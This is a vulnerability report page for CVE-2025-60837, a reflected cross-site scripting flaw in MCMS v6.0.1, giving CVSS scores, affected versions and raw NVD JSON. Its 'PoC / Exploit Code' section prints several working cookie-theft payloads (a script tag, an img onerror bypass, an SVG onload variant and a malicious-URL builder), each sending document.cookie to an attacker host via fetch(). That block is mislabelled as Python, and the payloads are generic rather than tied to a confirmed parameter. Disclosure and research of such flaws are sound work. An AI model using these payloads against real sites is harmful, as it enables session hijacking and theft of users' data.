Security Vulnerability Report
中文
CVE-2025-60837 CVSS 6.1 MEDIUM

CVE-2025-60837

Published: 2025-10-23 19:15:51
Last Modified: 2025-10-27 20:13:17

Description

A reflected cross-site scripting (XSS) vulnerability in MCMS v6.0.1 allows attackers to execute arbitrary Javascript in the context of a user's browser via a crafted payload.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:* - VULNERABLE
MCMS < 6.0.1(可能所有版本均受影响)
MCMS v6.0.1(确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60837 PoC - MCMS v6.0.1 Reflected XSS --> <!-- 恶意链接示例 --> <!-- https://target-mcms-site.com/path?param=<script>alert(document.cookie)</script> --> <!-- 实际攻击载荷 - 窃取Cookie --> <script> fetch('https://attacker.com/steal?cookie=' + document.cookie); </script> <!-- 绕过过滤的变体载荷 --> <img src=x onerror="fetch('https://attacker.com/steal?data='+btoa(document.cookie))"> <!-- SVG-based payload --> <svg/onload=fetch('https://attacker.com/log?c='+document.cookie)> <!-- 构造钓鱼攻击的完整PoC --> const xssPayload = '<script>fetch("https://attacker-controlled-server.com/collect?session="+document.cookie+"&url="+location.href)</script>'; const maliciousURL = 'http://target-mcms.com/mcms?' + encodeURIComponent('search') + '=' + encodeURIComponent(xssPayload); console.log('Malicious URL:', maliciousURL);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60837", "sourceIdentifier": "[email protected]", "published": "2025-10-23T19:15:50.743", "lastModified": "2025-10-27T20:13:17.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in MCMS v6.0.1 allows attackers to execute arbitrary Javascript in the context of a user's browser via a crafted payload."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.1", "matchCriteriaId": "DA267F05-AD0F-4710-AFF1-48D6E07AE377"}]}]}], "references": [{"url": "http://mcms.com", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://gist.github.com/xuzhiwei66666666/5cec37c9f674a08bc0d8654d42b4137a", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/mingSoft/MCMS", "source": "[email protected]", "tags": ["Product"]}]}}